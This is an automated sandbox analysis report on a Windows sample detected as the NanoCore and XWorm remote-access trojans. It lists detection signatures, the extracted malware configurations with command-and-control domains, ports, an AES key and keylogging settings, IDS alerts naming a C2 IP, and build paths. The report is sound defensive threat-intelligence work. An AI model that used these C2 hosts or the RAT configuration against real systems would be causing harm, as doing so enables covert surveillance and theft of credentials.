Windows Analysis Report
new policy.scr.exe

Overview

General Information

Sample name:	new policy.scr.exe
Analysis ID:	1502158
MD5:	01e7e40055d24780359493decf90ac21
SHA1:	b59b66a3af3a9920b7de22975997a1ec1e4d5528
SHA256:	3a5134cc11c7c47b7268e7bf6bf1556c5ff5044af54b7931cae652bfd8d83717
Tags:	exeNanoCoreRAT
Infos:

Detection

Nanocore, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Nanocore RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious names

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious Malware Callback Communication

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nanocore RAT, NanoCore	Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.	APT33 The Gorgon Group	https://assets.virustotal.com/reports/2021trends.pdf https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack	https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: new policy.scr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Avira: detection malicious, Label: HEUR/AGEN.1323683

Found malware configuration

Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "7065c9a5-e7ef-4b4a-9ad2-3b36dc82", "Group": "JksonN", "Domain1": "jacksonnnn233.theworkpc.com", "Domain2": "", "Port": 65535, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["airlineagancy.casacam.net"], "Port": "7076", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Networks!.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Virustotal: Detection: 56%			Perma Link

Multi AV Scanner detection for submitted file

Source: new policy.scr.exe	ReversingLabs: Detection: 55%
Source: new policy.scr.exe	Virustotal: Detection: 56%			Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: new policy.scr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: airlineagancy.casacam.net
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: 7076
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: new policy.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: new policy.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_05C0D780
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D56B5Ch	0_2_05D56AD8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D5D260h	0_2_05D5D1A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D5D260h	0_2_05D5D1A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D56B5Ch	0_2_05D56AC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_077510B3
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_07756D10
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_07756D00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B530BD
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B51A00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B51A08
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B519B9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52FD9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52DB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52DC0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	6_2_05C4D780
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D96B5Ch	6_2_05D96AD8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D9D260h	6_2_05D9D1A8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D9D260h	6_2_05D9D1A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D96B5Ch	6_2_05D96AC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F130BD
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F13138
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F119B9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F11A00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F11A08
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12DC0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12DB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12FD9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_057FD780
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05946B5Ch	7_2_05946AD8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 0594D260h	7_2_0594D1A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 0594D260h	7_2_0594D1A8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05946B5Ch	7_2_05946AC8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046909 - Severity 1 - ET MALWARE NanoCore RAT Keepalive Response 1 : 78.159.112.29:65535 -> 192.168.2.4:53344
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53345 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53347 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53349 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53346 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53350 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2816718 - Severity 1 - ETPRO MALWARE NanoCore RAT Keep-Alive Beacon : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53343 -> 78.159.112.29:65535

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: airlineagancy.casacam.net
Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: jacksonnnn233.theworkpc.com

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 78.159.112.29:65535

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LEASEWEB-DE-FRA-10DE LEASEWEB-DE-FRA-10DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: jacksonnnn233.theworkpc.com
Source: global traffic	DNS traffic detected: DNS query: airlineagancy.casacam.net
Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa

Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://google.com
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.0000000002511000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2232333043.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2324492421.00000000047C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
